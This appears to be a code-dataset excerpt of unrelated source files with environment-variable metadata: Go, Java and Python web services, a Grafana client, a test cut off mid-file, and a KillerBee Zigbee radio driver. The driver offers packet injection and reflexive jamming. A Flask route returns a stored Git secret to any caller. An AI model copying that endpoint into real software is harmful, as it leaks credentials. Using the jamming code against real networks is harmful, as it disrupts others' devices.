private static final TransformSafeLogger logger =
TransformSafeLogger.getLogger(TransformLoggingListener.class);
@Override
public void onError(
String typeName,
ClassLoader classLoader,
JavaModule module,
boolean loaded,
Throwable throwable) {
if (logger.isDebugEnabled()) {
logger.debug(
"Failed to handle {} for transformation on classloader {}",
typeName,
classLoader,
throwable);
}
}
@Override
public void onTransformation(
TypeDescription typeDescription,
ClassLoader classLoader,
JavaModule module,
boolean loaded,
DynamicType dynamicType) {
logger.debug("Transformed {} -- {}", typeDescription.getName(), classLoader);
}
}
/**
* Register a callback to run when a class is loading.
*
* <p>Caveats:
*
* <ul>
* <li>This callback will be invoked by a jvm class transformer.
* <li>Classes filtered out by {@link AgentInstaller}'s skip list will not be matched.
* </ul>
*
* @param className name of the class to match against
* @param callback runnable to invoke when class name matches
*/
public static void registerClassLoadCallback(String className, Runnable callback) {
synchronized (CLASS_LOAD_CALLBACKS) {
List<Runnable> callbacks =
CLASS_LOAD_CALLBACKS.computeIfAbsent(className, k -> new ArrayList<>());
callbacks.add(callback);
}
}
private static class DelayedAfterAgentCallback implements Runnable {
private final Iterable<AgentListener> agentListeners;
private final Config config;
private DelayedAfterAgentCallback(Config config, Iterable<AgentListener> agentListeners) {
this.agentListeners = agentListeners;
this.config = config;
}
@Override
public void run() {
/*
* This callback is called from within bytecode transformer. This can be a problem if callback tries
* to load classes being transformed. To avoid this we start a thread here that calls the callback.
* This seems to resolve this problem.
*/
Thread thread = new Thread(this::runAgentListeners);
thread.setName("delayed-agent-listeners");
thread.setDaemon(true);
thread.start();
}
private void runAgentListeners() {
for (AgentListener agentListener : agentListeners) {
try {
agentListener.afterAgent(config);
} catch (RuntimeException e) {
logger.error("Failed to execute {}", agentListener.getClass().getName(), e);
}
}
}
}
private static class ClassLoadListener extends AgentBuilder.Listener.Adapter {
@Override
public void onComplete(
String typeName, ClassLoader classLoader, JavaModule javaModule, boolean b) {
synchronized (CLASS_LOAD_CALLBACKS) {
List<Runnable> callbacks = CLASS_LOAD_CALLBACKS.get(typeName);
if (callbacks != null) {
for (Runnable callback : callbacks) {
callback.run();
}
}
}
}
}
private static class RedefinitionDiscoveryStrategy
implements AgentBuilder.RedefinitionStrategy.DiscoveryStrategy {
private static final AgentBuilder.RedefinitionStrategy.DiscoveryStrategy delegate =
AgentBuilder.RedefinitionStrategy.DiscoveryStrategy.Reiterating.INSTANCE;
@Override
public Iterable<Iterable<Class<?>>> resolve(Instrumentation instrumentation) {
// filter out our agent classes and injected helper classes
return () ->
streamOf(delegate.resolve(instrumentation))
.map(RedefinitionDiscoveryStrategy::filterClasses)
.iterator();
}
private static Iterable<Class<?>> filterClasses(Iterable<Class<?>> classes) {
return () -> streamOf(classes).filter(c -> !isIgnored(c)).iterator();
}
private static <T> Stream<T> streamOf(Iterable<T> iterable) {
return StreamSupport.stream(iterable.spliterator(), false);
}
private static boolean isIgnored(Class<?> c) {
ClassLoader cl = c.getClassLoader();
if (cl instanceof AgentClassLoader || cl instanceof ExtensionClassLoader) {
return true;
}
// ignore generate byte buddy helper class
if (c.getName().startsWith("java.lang.ClassLoader$ByteBuddyAccessor$")) {
return true;
}
return HelperInjector.isInjectedClass(c);
}
}
/** Detect if the instrumented application is using a custom JUL LogManager. */
private static boolean isAppUsingCustomLogManager() {
String jbossHome = System.getenv("JBOSS_HOME");
if (jbossHome != null) {
logger.debug("Found JBoss: {}; assuming app is using custom LogManager", jbossHome);
// JBoss/Wildfly is known to set a custom log manager after startup.
// Originally we were checking for the presence of a jboss class,
// but it seems some non-jboss applications have jboss classes on the classpath.
// This would cause AgentListener#afterAgent() calls to be delayed indefinitely.
// Checking for an environment variable required by jboss instead.
return true;
}
String customLogManager = System.getProperty("java.util.logging.manager");
if (customLogManager != null) {
logger.debug(
"Detected custom LogManager configuration: java.util.logging.manager={}",
customLogManager);
boolean onSysClasspath =
ClassLoader.getSystemResource(getResourceName(customLogManager)) != null;
logger.debug(
"Class {} is on system classpath: {}delaying AgentInstaller#afterAgent()",
customLogManager,
onSysClasspath ? "not " : "");
// Some applications set java.util.logging.manager but never actually initialize the logger.
// Check to see if the configured manager is on the system classpath.
// If so, it should be safe to initialize AgentInstaller which will setup the log manager:
// LogManager tries to load the implementation first using system CL, then falls back to
// current context CL
return !onSysClasspath;
}
return false;
}
private static void logVersionInfo() {
VersionLogger.logAllVersions();
logger.debug(
"{} loaded on {}", AgentInstaller.class.getName(), AgentInstaller.class.getClassLoader());
}
private AgentInstaller() {}
private static class StrictContextStressor implements ContextStorage, AutoCloseable {
private final ContextStorage contextStorage;
private final int sleepMillis;
private StrictContextStressor(ContextStorage contextStorage, int sleepMillis) {
this.contextStorage = contextStorage;
this.sleepMillis = sleepMillis;
}
@Override
public Scope attach(Context toAttach) {
return wrap(contextStorage.attach(toAttach));
}
@Nullable
@Override
public Context current() {
return contextStorage.current();
}
@Override
public void close() throws Exception {
if (contextStorage instanceof AutoCloseable) {
((AutoCloseable) contextStorage).close();
}
}
private Scope wrap(Scope scope) {
return () -> {
try {
Thread.sleep(sleepMillis);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
scope.close();
};
}
}
}
|
[
"\"JBOSS_HOME\""
] |
[] |
[
"JBOSS_HOME"
] |
[]
|
["JBOSS_HOME"]
|
java
| 1 | 0 | |
main.go
|
package main
import (
"context"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"github.com/gin-gonic/gin"
"os"
"strconv"
"strings"
"github.com/aws/aws-sdk-go/aws/ec2metadata"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-xray-sdk-go/xray"
_ "github.com/aws/aws-xray-sdk-go/plugins/ecs"
)
func init() {
xray.Configure(xray.Config{
DaemonAddr: "127.0.0.1:2000",
ServiceVersion: "1.2.3",
})
}
func main() {
flag.Parse()
if flag.Arg(0) == "hc" {
fmt.Println("ok")
} else {
fmt.Println("=== Application API Starting!!")
router := gin.Default()
router.Use(func(ctx *gin.Context) {
TraceSeg(ctx, ctx.Request.URL.Path) //ここで返ってくるcontextを次のハンドラに渡したい…
ctx.Next()
})
router.GET("/", notFoundHandler)
router.GET("/hc", healthHandler)
router.GET("/info", infoHandler)
router.GET("/fibo", fiboHandler)
router.GET("/zipcode", zipcodeHandler)
router.GET("/down", downHandler)
router.Run(":8080")
}
}
func TraceSeg(c context.Context, service string) (*context.Context) {
ctx, seg := xray.BeginSegment(c, service)
fmt.Println(service)
seg.Close(nil)
return &ctx
}
func TraceSubSeg(c context.Context, service string) (*context.Context) {
ctx, subSeg := xray.BeginSubsegment(c, service)
fmt.Println(service)
subSeg.Close(nil)
return &ctx
}
func notFoundHandler(ctx *gin.Context) {
fmt.Println("--- notFoundHandler")
ctx.String(404, "404 Not Found!!")
}
func healthHandler(ctx *gin.Context) {
fmt.Println("--- healthHandler")
ctx.String(200, "OK")
}
func infoHandler(ctx *gin.Context) {
fmt.Println("--- infoHandler")
// インスタンスIDの取得
sess := session.Must(session.NewSession())
svc := ec2metadata.New(sess)
doc, _ := svc.GetInstanceIdentityDocument()
instanceId := doc.InstanceID
// コンテナIDの取得
containerId, _ := os.Hostname()
// タスクの取得
resp, err := http.Get(os.Getenv("ECS_CONTAINER_METADATA_URI"))
if err != nil {
ctx.String(500, "ERROR")
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
ctx.String(500, "ERROR")
return
}
var metadata interface{}
err = json.Unmarshal(body, &metadata)
if err != nil {
ctx.String(500, "ERROR")
return
}
taskArn := metadata.(map[string]interface{})["Labels"].(map[string]interface{})["com.amazonaws.ecs.task-arn"].(string)
task := strings.Split(taskArn, "/")[1]
// レスポンス
ctx.String(200, "instanceId: "+instanceId+"\ntask: "+task+"\ncontainerId: "+containerId)
}
func fiboHandler(ctx *gin.Context) {
fmt.Println("--- fiboHandler")
n, err := strconv.Atoi(ctx.Query("n"))
if err != nil {
ctx.String(500, "ERROR")
return
}
ctx.String(200, strconv.Itoa(n)+"番目のフィボナッチ数は、"+strconv.Itoa(fibo(n)))
}
func zipcodeHandler(ctx *gin.Context) {
fmt.Println("--- zipcodeHandler")
newCtx := ctx.Request.Context()
zipcode, err := strconv.Atoi(ctx.Query("zipcode"))
if err != nil {
ctx.String(500, "ERROR")
return
}
myClient := xray.Client(http.DefaultClient)
req, err := http.NewRequest(http.MethodGet, "http://zipcloud.ibsnet.co.jp/api/search?zipcode=" + strconv.Itoa(zipcode), nil)
if err != nil {
fmt.Errorf("[BUG] failed to build request: %s", err)
return
}
// c := (*((*ctx).Request)).Context()
// fmt.Println(c)
resp, err := myClient.Do(req.WithContext(*newCtx))
ctx.String(200, "http://zipcloud.ibsnet.co.jp/api/search?zipcode=" + strconv.Itoa(zipcode))
if err != nil {
ctx.String(500, "ERROR")
return
}
defer resp.Body.Close()
b, err := ioutil.ReadAll(resp.Body)
if err == nil {
ctx.String(200, string(b))
}
}
func downHandler(ctx *gin.Context) {
fmt.Println("--- downHandler")
ctx.String(500, "DOWN!!!")
log.Fatal("DOWN!!!")
}
func fibo(n int) int {
if n < 2 {
return 1
}
return fibo(n-2) + fibo(n-1)
}
|
[
"\"ECS_CONTAINER_METADATA_URI\""
] |
[] |
[
"ECS_CONTAINER_METADATA_URI"
] |
[]
|
["ECS_CONTAINER_METADATA_URI"]
|
go
| 1 | 0 | |
forum_app/api/website.py
|
#
################################################################################
# Modules and functions import statements
################################################################################
import json
import logging
import hmac
import hashlib
from datetime import datetime
from time import time
from flask import request, make_response, abort
from forum_app import app, secrets
import git
import os
@app.route('/api/website/env', methods=['GET', 'POST'])
def api_website_env():
logging.info("In api_website_env()")
# sec1 = os.getenv('BASH_SECRET')
# sec2 = os.getenv('OTHER_SECRET')
# app_secrets_file = open('/home/zhixian/.app-secrets.json')
# app_secrets = json.load(app_secrets_file)
# return str(app_secrets)
return secrets['GIT_SECRET']
# return str(os.environ)
#return str(sec1) + ' -- ' + str(sec2)
@app.route('/api/website/datetime', methods=['GET', 'POST'])
def api_datetime():
logging.info("In api_datetime()")
# root_logger = logging.getLogger()
try:
# logging.info(len(root_logger.handlers))
# logging.info((str(root_logger.handlers[0])))
# logging.info((str(root_logger.handlers[1])))
# for h in root_logger.handlers:
# logging.info(str(h))
# # logging.info(str(h.level))
# # logging.info(str(h.name))
# logging_format = logging.Formatter('%(asctime)-15s %(levelname)-8s %(funcName)-20s %(message)s')
# default_console_logger = root_logger.handlers[0]
# default_console_logger.setFormatter(logging_format)
# logging.info("OK SZET")
# x = root_logger.handlers[0]
# logging.info(x.name)
# logging.info(x.level)
# logging.info(str(type(x)))
# x.setFormatter(logging_format)
# y = root_logger.handlers[1]
# logging.info(y.name)
# logging.info(y.level)
# logging.info(str(type(y)))
# y.setFormatter(logging_format)
logging.info('asdzxc')
#logging.info(str(dir(logging.getLogger().handlers[0])))
# logging.info(str(logging.getLogger().handlers[0]))
# logging.info(str(logging.getLogger().handlers[1]))
# logging.info(root_logger.handlers[0].name)
# logging.info(root_logger.handlers[1].name)
# logging.info(root_logger.handlers[0].level)
# logging.info(root_logger.handlers[1].level)
except Exception as e:
logging.info("ERROR----------ERROR----------")
logging.error(e)
logging.info("In api_datetime() END")
return str(datetime.utcnow())
@app.route('/api/website/change-notification', methods=['POST'])
def api_website_change_notification():
logging.info("In api_website_change_notification()")
is_post = request.method == 'POST'
has_x_hub_signature = "X-Hub-Signature" in request.headers
has_git_webhook_secret = 'GIT_WEBHOOK_SECRET' in secrets
if is_post and has_x_hub_signature and has_git_webhook_secret:
signature = request.headers["X-Hub-Signature"]
encoded_git_webhook_secret = secrets['GIT_WEBHOOK_SECRET'].encode("utf8")
hash_algorithm, hash_value = signature.split("=")
logging.info(f"github_hash_key:{hash_algorithm}, github_hash:{hash_value}")
mac = hmac.new(encoded_git_webhook_secret, msg=request.data, digestmod=hash_algorithm)
is_matching_hash = hmac.compare_digest(mac.hexdigest(), hash_value)
logging.info(f"Github hash match: {is_matching_hash}")
if is_matching_hash:
repo = git.Repo('/home/zhixian/website')
origin = repo.remotes.origin
origin.pull()
logging.info("Local Github repository pulled.")
return 'OK', 200
else:
error_message = f"Invalid api_website_change_notification() call; is_post:{is_post}, has_x_hub_signature: {has_x_hub_signature} has_git_webhook_secret: {has_git_webhook_secret}"
logging.info(error_message)
return error_message, 400
|
[] |
[] |
[
"BASH_SECRET",
"OTHER_SECRET"
] |
[]
|
["BASH_SECRET", "OTHER_SECRET"]
|
python
| 2 | 0 | |
killerbee/dev_telosb.py
|
'''
Support for the TelosB / Tmote Sky platforms, and close clones.
Utilizes the GoodFET firmware with CCSPI application, and the GoodFET client code.
'''
import os
import time
import struct
import time
from datetime import datetime, timedelta
from kbutils import KBCapabilities, makeFCS
from GoodFETCCSPI import GoodFETCCSPI
CC2420_REG_SYNC = 0x14
class TELOSB:
def __init__(self, dev):
'''
Instantiates the KillerBee class for our TelosB/TmoteSky running GoodFET firmware.
@type dev: String
@param dev: Serial device identifier (ex /dev/ttyUSB0)
@return: None
@rtype: None
'''
self._channel = None
self._page = 0
self.handle = None
self.dev = dev
os.environ["board"] = "telosb" #set enviroment variable for GoodFET code to use
self.handle = GoodFETCCSPI()
self.handle.serInit(port=self.dev)
self.handle.setup()
self.__stream_open = False
self.capabilities = KBCapabilities()
self.__set_capabilities()
def close(self):
self.handle.serClose()
self.handle = None
def check_capability(self, capab):
return self.capabilities.check(capab)
def get_capabilities(self):
return self.capabilities.getlist()
def __set_capabilities(self):
'''
Sets the capability information appropriate for GoodFETCCSPI client and firmware.
@rtype: None
@return: None
'''
self.capabilities.setcapab(KBCapabilities.FREQ_2400, True)
self.capabilities.setcapab(KBCapabilities.SNIFF, True)
self.capabilities.setcapab(KBCapabilities.SETCHAN, True)
self.capabilities.setcapab(KBCapabilities.INJECT, True)
self.capabilities.setcapab(KBCapabilities.PHYJAM_REFLEX, True)
self.capabilities.setcapab(KBCapabilities.SET_SYNC, True)
return
# KillerBee expects the driver to implement this function
#def get_dev_info(self, dev, bus):
def get_dev_info(self):
'''
Returns device information in a list identifying the device.
@rtype: List
@return: List of 3 strings identifying device.
'''
return [self.dev, "TelosB/Tmote", ""]
# KillerBee expects the driver to implement this function
def sniffer_on(self, channel=None, page=0):
'''
Turns the sniffer on such that pnext() will start returning observed
data. Will set the command mode to Air Capture if it is not already
set.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.SNIFF)
self.handle.RF_promiscuity(1);
self.handle.RF_autocrc(0);
if channel != None:
self.set_channel(channel, page)
self.handle.CC_RFST_RX();
#print "Sniffer started (listening as %010x on %i MHz)" % (self.handle.RF_getsmac(), self.handle.RF_getfreq()/10**6);
self.__stream_open = True
# KillerBee expects the driver to implement this function
def sniffer_off(self):
'''
Turns the sniffer off, freeing the hardware for other functions. It is
not necessary to call this function before closing the interface with
close().
@rtype: None
'''
#TODO actually have firmware stop sending us packets!
self.__stream_open = False
# KillerBee expects the driver to implement this function
def set_channel(self, channel, page=0):
'''
Sets the radio interface to the specifid channel (limited to 2.4 GHz channels 11-26)
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.SETCHAN)
if channel >= 11 or channel <= 26:
self._channel = channel
self.handle.RF_setchan(channel)
else:
raise Exception('Invalid channel')
if page:
raise Exception('SubGHz not supported')
# KillerBee expects the driver to implement this function
def inject(self, packet, channel=None, count=1, delay=0, page=0):
'''
Injects the specified packet contents.
@type packet: String
@param packet: Packet contents to transmit, without FCS.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@type count: Integer
@param count: Transmits a specified number of frames, def=1
@type delay: Float
@param delay: Delay between each frame, def=1
@rtype: None
'''
self.capabilities.require(KBCapabilities.INJECT)
if len(packet) < 1:
raise Exception('Empty packet')
if len(packet) > 125: # 127 - 2 to accommodate FCS
raise Exception('Packet too long')
if channel != None:
self.set_channel(channel, page)
self.handle.RF_autocrc(1) #let radio add the CRC
for pnum in range(0, count):
gfready = [ord(x) for x in packet] #convert packet string to GoodFET expected integer format
gfready.insert(0, len(gfready)+2) #add a length that leaves room for CRC
self.handle.RF_txpacket(gfready)
# Sleep was for 1 second but testing by Gianfranco Costamagna suggested lowering to 1/100th of a second
time.sleep(0.01) #TODO get rid of completely, and just check CC2420 status
# https://github.com/alvarop/msp430-cc2500/blob/master/lib/cc2500/cc2500.c
# KillerBee expects the driver to implement this function
def pnext(self, timeout=100):
'''
Returns a dictionary containing packet data, else None.
@type timeout: Integer
@param timeout: Timeout to wait for packet reception in usec
@rtype: List
@return: Returns None is timeout expires and no packet received. When a packet is received, a dictionary is returned with the keys bytes (string of packet bytes), validcrc (boolean if a vaid CRC), rssi (unscaled RSSI), and location (may be set to None). For backwards compatibility, keys for 0,1,2 are provided such that it can be treated as if a list is returned, in the form [ String: packet contents | Bool: Valid CRC | Int: Unscaled RSSI ]
'''
if self.__stream_open == False:
self.sniffer_on() #start sniffing
packet = None;
start = datetime.utcnow()
while (packet is None and (start + timedelta(microseconds=timeout) > datetime.utcnow())):
packet = self.handle.RF_rxpacket()
rssi = self.handle.RF_getrssi() #TODO calibrate
if packet is None:
return None
frame = packet[1:]
if frame[-2:] == makeFCS(frame[:-2]): validcrc = True
else: validcrc = False
#Return in a nicer dictionary format, so we don't have to reference by number indicies.
#Note that 0,1,2 indicies inserted twice for backwards compatibility.
result = {0:frame, 1:validcrc, 2:rssi, 'bytes':frame, 'validcrc':validcrc, 'rssi':rssi, 'location':None}
result['dbm'] = rssi - 45 #TODO tune specifically to the Tmote platform (does ext antenna need to different?)
result['datetime'] = datetime.utcnow()
return result
def ping(self, da, panid, sa, channel=None, page=0):
'''
Not yet implemented.
@return: None
@rtype: None
'''
raise Exception('Not yet implemented')
def jammer_on(self, channel=None, page=0):
'''
Not yet implemented.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not support on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.PHYJAM_REFLEX)
self.handle.RF_promiscuity(1)
self.handle.RF_autocrc(0)
if channel != None:
self.set_channel(channel, page)
self.handle.CC_RFST_RX()
self.handle.RF_reflexjam()
def set_sync(self, sync=0xA70F):
'''Set the register controlling the 802.15.4 PHY sync byte.'''
self.capabilities.require(KBCapabilities.SET_SYNC)
if (sync >> 16) > 0:
raise Exception("Sync word (%x) must be 2-bytes or less." % sync)
return self.handle.poke(CC2420_REG_SYNC, sync)
def jammer_off(self, channel=None, page=0):
'''
Not yet implemented.
@return: None
@rtype: None
'''
#TODO implement
raise Exception('Not yet implemented')
|
[] |
[] |
[
"board"
] |
[]
|
["board"]
|
python
| 1 | 0 | |
client.go
|
package gapi
import (
"bytes"
"fmt"
"io"
"log"
"net/http"
"net/url"
"os"
"path"
"strings"
)
type Client struct {
key string
baseURL url.URL
*http.Client
}
//New creates a new grafana client
//auth can be in user:pass format, or it can be an api key
func New(auth, baseURL string) (*Client, error) {
u, err := url.Parse(baseURL)
if err != nil {
return nil, err
}
key := ""
if strings.Contains(auth, ":") {
split := strings.Split(auth, ":")
u.User = url.UserPassword(split[0], split[1])
} else {
key = fmt.Sprintf("Bearer %s", auth)
}
return &Client{
key,
*u,
&http.Client{},
}, nil
}
func (c *Client) newRequest(method, requestPath string, query url.Values, body io.Reader) (*http.Request, error) {
url := c.baseURL
url.Path = path.Join(url.Path, requestPath)
url.RawQuery = query.Encode()
req, err := http.NewRequest(method, url.String(), body)
if err != nil {
return req, err
}
if c.key != "" {
req.Header.Add("Authorization", c.key)
}
if os.Getenv("GF_LOG") != "" {
if body == nil {
log.Println("request to ", url.String(), "with no body data")
} else {
log.Println("request to ", url.String(), "with body data", body.(*bytes.Buffer).String())
}
}
req.Header.Add("Content-Type", "application/json")
return req, err
}
|
[
"\"GF_LOG\""
] |
[] |
[
"GF_LOG"
] |
[]
|
["GF_LOG"]
|
go
| 1 | 0 | |
_examples/bar_chart/main.go
|
package main
import (
"fmt"
"log"
"net/http"
"os"
"github.com/beevee/go-chart"
)
func drawChart(res http.ResponseWriter, req *http.Request) {
sbc := chart.BarChart{
Title: "Test Bar Chart",
TitleStyle: chart.StyleShow(),
Background: chart.Style{
Padding: chart.Box{
Top: 40,
},
},
Height: 512,
BarWidth: 60,
XAxis: chart.StyleShow(),
YAxis: chart.YAxis{
Style: chart.StyleShow(),
},
Bars: []chart.Value{
{Value: 5.25, Label: "Blue"},
{Value: 4.88, Label: "Green"},
{Value: 4.74, Label: "Gray"},
{Value: 3.22, Label: "Orange"},
{Value: 3, Label: "Test"},
{Value: 2.27, Label: "??"},
{Value: 1, Label: "!!"},
},
}
res.Header().Set("Content-Type", "image/png")
err := sbc.Render(chart.PNG, res)
if err != nil {
fmt.Printf("Error rendering chart: %v\n", err)
}
}
func port() string {
if len(os.Getenv("PORT")) > 0 {
return os.Getenv("PORT")
}
return "8080"
}
func main() {
listenPort := fmt.Sprintf(":%s", port())
fmt.Printf("Listening on %s\n", listenPort)
http.HandleFunc("/", drawChart)
log.Fatal(http.ListenAndServe(listenPort, nil))
}
|
[
"\"PORT\"",
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
api/handler/user.go
|
package handler
import (
"encoding/json"
"net/http"
"os"
"time"
"github.com/ATechnoHazard/hades-2/api/middleware"
"github.com/ATechnoHazard/hades-2/api/views"
u "github.com/ATechnoHazard/hades-2/internal/utils"
"github.com/ATechnoHazard/hades-2/pkg/entities"
"github.com/ATechnoHazard/hades-2/pkg/user"
"github.com/julienschmidt/httprouter"
)
func signUp(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
acc := &entities.User{}
if err := json.NewDecoder(r.Body).Decode(acc); err != nil {
views.Wrap(err, w)
return
}
acc.CreatedAt = time.Now()
tk, err := uSvc.CreateUser(acc)
if err != nil {
views.Wrap(err, w)
return
}
tkString, err := tk.SignedString([]byte(os.Getenv("TOKEN_PASSWORD")))
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "User account successfully saved")
msg["token"] = tkString
u.Respond(w, msg)
}
}
func login(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
acc := &entities.User{}
if err := json.NewDecoder(r.Body).Decode(acc); err != nil {
views.Wrap(err, w)
return
}
tk, err := uSvc.Login(acc.Email, acc.Password)
if err != nil {
views.Wrap(err, w)
return
}
tkString, err := tk.SignedString([]byte(os.Getenv("TOKEN_PASSWORD")))
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully logged in")
msg["token"] = tkString
u.Respond(w, msg)
}
}
func getUserOrgs(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
tk := ctx.Value(middleware.JwtContextKey("token")).(*middleware.Token)
orgs, err := uSvc.GetUserOrgs(tk.Email)
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully retrieved user organizations")
msg["organizations"] = orgs
u.Respond(w, msg)
}
}
func getAllUsers(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
tk := ctx.Value(middleware.JwtContextKey("token")).(*middleware.Token)
users, err := uSvc.GetOrgUsers(tk.OrgID)
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully retrieved organization users")
msg["users"] = users
u.Respond(w, msg)
return
}
}
func MakeUserHandler(r *httprouter.Router, uSvc user.Service) {
r.HandlerFunc("POST", "/api/v2/org/signup", signUp(uSvc))
r.HandlerFunc("POST", "/api/v2/org/login", login(uSvc))
r.HandlerFunc("GET", "/api/v2/org", middleware.JwtAuthentication(getUserOrgs(uSvc)))
r.HandlerFunc("GET", "/api/v2/org/users", middleware.JwtAuthentication(getAllUsers(uSvc)))
}
|
[
"\"TOKEN_PASSWORD\"",
"\"TOKEN_PASSWORD\""
] |
[] |
[
"TOKEN_PASSWORD"
] |
[]
|
["TOKEN_PASSWORD"]
|
go
| 1 | 0 | |
image/manifest/manifest_test.go
|
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package manifest_test
import (
"fmt"
"os"
"path/filepath"
"testing"
"github.com/stretchr/testify/require"
"golang.org/x/xerrors"
"sigs.k8s.io/promo-tools/v3/image/manifest"
"sigs.k8s.io/promo-tools/v3/internal/legacy/dockerregistry/registry"
"sigs.k8s.io/promo-tools/v3/internal/legacy/dockerregistry/schema"
"sigs.k8s.io/promo-tools/v3/types/image"
)
// TODO: Consider merging this with bazelTestPath() from inventory
func testPath(paths ...string) string {
prefix := []string{
os.Getenv("PWD"),
"testdata",
}
return filepath.Join(append(prefix, paths...)...)
}
func TestFind(t *testing.T) {
pwd := testPath()
srcRC := registry.Context{
Name: "gcr.io/foo-staging",
ServiceAccount: "[email protected]",
Src: true,
}
tests := []struct {
// name is folder name
name string
input manifest.GrowOptions
expectedManifest schema.Manifest
expectedErr error
}{
{
"empty",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "empty"),
StagingRepo: "gcr.io/foo",
},
schema.Manifest{},
&os.PathError{
Op: "stat",
Path: filepath.Join(pwd, "empty/images"),
Err: fmt.Errorf("no such file or directory"),
},
},
{
"singleton",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "singleton"),
StagingRepo: "gcr.io/foo-staging",
},
schema.Manifest{
Registries: []registry.Context{
srcRC,
{
Name: "us.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
{
Name: "eu.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
{
Name: "asia.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
},
Images: []registry.Image{
{
Name: "foo-controller",
Dmap: registry.DigestTags{
"sha256:c3d310f4741b3642497da8826e0986db5e02afc9777a2b8e668c8e41034128c1": {"1.0"},
},
},
},
Filepath: filepath.Join(pwd, "singleton/manifests/a/promoter-manifest.yaml"),
},
nil,
},
{
"singleton (unrecognized staging repo)",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "singleton"),
StagingRepo: "gcr.io/nonsense-staging",
},
schema.Manifest{},
fmt.Errorf("could not find Manifest for %q", "gcr.io/nonsense-staging"),
},
}
for _, test := range tests {
gotManifest, gotErr := manifest.Find(&test.input)
// Clean up gotManifest for purposes of comparing against expected
// results. Namely, clear out the SrcRegistry pointer because this will
// always be different.
gotManifest.SrcRegistry = nil
require.Equal(t, test.expectedManifest, gotManifest)
var gotErrStr string
var expectedErrStr string
if gotErr != nil {
gotErrStr = gotErr.Error()
}
if test.expectedErr != nil {
expectedErrStr = test.expectedErr.Error()
}
require.Equal(t, expectedErrStr, gotErrStr)
}
}
func TestApplyFilters(t *testing.T) {
tests := []struct {
// name is folder name
name string
inputOptions manifest.GrowOptions
inputRii registry.RegInvImage
expectedRii registry.RegInvImage
expectedErr error
}{
{
"empty rii",
manifest.GrowOptions{},
registry.RegInvImage{},
registry.RegInvImage{},
nil,
},
{
"no filters --- same as input",
manifest.GrowOptions{},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
nil,
},
{
"remove 'latest' tag by default, even if no filters",
manifest.GrowOptions{},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
nil,
},
{
"filter on image name only",
manifest.GrowOptions{
FilterImages: []image.Name{"bar"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"bar": {
"sha256:111": {"1.0"},
},
},
nil,
},
{
"filter on tag only",
manifest.GrowOptions{
FilterTags: []image.Tag{"1.0"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"bar": {
"sha256:111": {"1.0"},
},
},
nil,
},
{
"filter on 'latest' tag",
manifest.GrowOptions{
FilterTags: []image.Tag{"latest"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{},
xerrors.New("no images survived filtering; double-check your --filter_* flag(s) for typos"),
},
{
"filter on digest",
manifest.GrowOptions{
FilterDigests: []image.Digest{"sha256:222"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:222": {"3.0"},
},
},
nil,
},
{
"filter on shared tag (multiple images share same tag)",
manifest.GrowOptions{
FilterTags: []image.Tag{"1.2.3"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "1.2.3"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.2.3"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"1.2.3"},
},
"bar": {
"sha256:111": {"1.2.3"},
},
},
nil,
},
{
"filter on shared tag and image name (multiple images share same tag)",
manifest.GrowOptions{
